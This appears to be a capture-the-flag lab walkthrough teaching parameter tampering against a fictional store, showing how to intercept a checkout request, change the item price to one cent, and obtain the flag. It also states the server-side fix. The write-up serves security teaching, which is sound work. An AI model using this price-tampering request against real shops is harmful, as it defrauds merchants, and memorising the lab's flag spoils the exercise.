Learn Hacking by Actually Hacking

Difficulty

Intermediate

Vuln class

Client-Side Price Trust / Parameter Tampering

Steps

// Objective

Intercept the Shoppr checkout request and modify the item price to $0.01, completing a $279 order for almost nothing.

// Tools required

BrowserHackr InterceptorDeveloper Tools

// Step-by-step walkthrough

Browse the Shoppr store

Open the Shoppr app and add a high-value item to your cart (the $279 item). Proceed to checkout. Open DevTools → Network tab before clicking "Pay Now".

Intercept the checkout request

Click "Pay Now" and catch the POST request to /api/checkout in DevTools or the Hackr Interceptor tab.

Command / Input

POST /api/checkout Content-Type: application/json {"items":[{"id":"SKU-001","name":"Premium Headphones","qty":1,"price":27900}],"total":27900}

⚑ Price is in cents. 27900 = $279.00. The server accepts the price from the client instead of looking it up from its own database.

Modify the price in the Interceptor

If using the Hackr Interceptor, forward the request to Repeater. Change the price and total to 1 (= $0.01) and send.

Command / Input

POST /api/checkout {"items":[{"id":"SKU-001","name":"Premium Headphones","qty":1,"price":1}],"total":1}

Output

{"status":"success","orderId":"ORD-8821","amountCharged":0.01}

⚑ The server charged $0.01 for a $279 item. It trusted the price field from the client instead of deriving the authoritative price server-side.

Retrieve the flag

After the order succeeds, the flag is shown on the order confirmation page.

Output

HackrGG{cl13nt_s1d3_pr1c3_trust_byp4ss}

⚑ The fix is simple: the server should look up the price from its own product database using the item ID, never trust a price sent by the client.

// Flag

Flag value

HackrGG{cl13nt_s1d3_pr1c3_trust_byp4ss}

Shown on the order confirmation page after a successful manipulated checkout.

Shoppr — Price Manipulation